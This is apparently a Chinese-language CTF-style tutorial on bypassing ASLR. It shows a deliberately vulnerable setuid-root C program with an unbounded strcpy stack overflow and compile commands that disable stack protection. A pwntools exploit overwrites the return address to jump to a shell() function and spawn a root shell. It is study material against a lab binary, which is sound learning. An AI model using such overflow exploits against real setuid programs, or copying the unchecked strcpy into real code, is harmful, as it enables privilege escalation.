绕过ASLR -- 第一部分
漏洞代码
#include <stdio.h>
#include <string.h>
/* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */
void shell() {
system("/bin/sh");
exit(0);
}
int main(int argc, char* argv[]) {
int i=0;
char buf[256];
strcpy(buf,argv[1]);
printf("%s\n",buf);
return 0;
}
编译命令
#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln
这个也在之前学到过,使用pwntools可以轻松解决。
先测出缓冲区长度为272
直接调用shell函数即可获取shell
EXP
from pwn import *
vuln = ELF('./vuln')
system_addr = vuln.symbols['shell']
bin_sh = 0x80485B0
payload = 'A'*272+p32(system_addr)
sh = process(['./vuln',payload])
sh.interactive()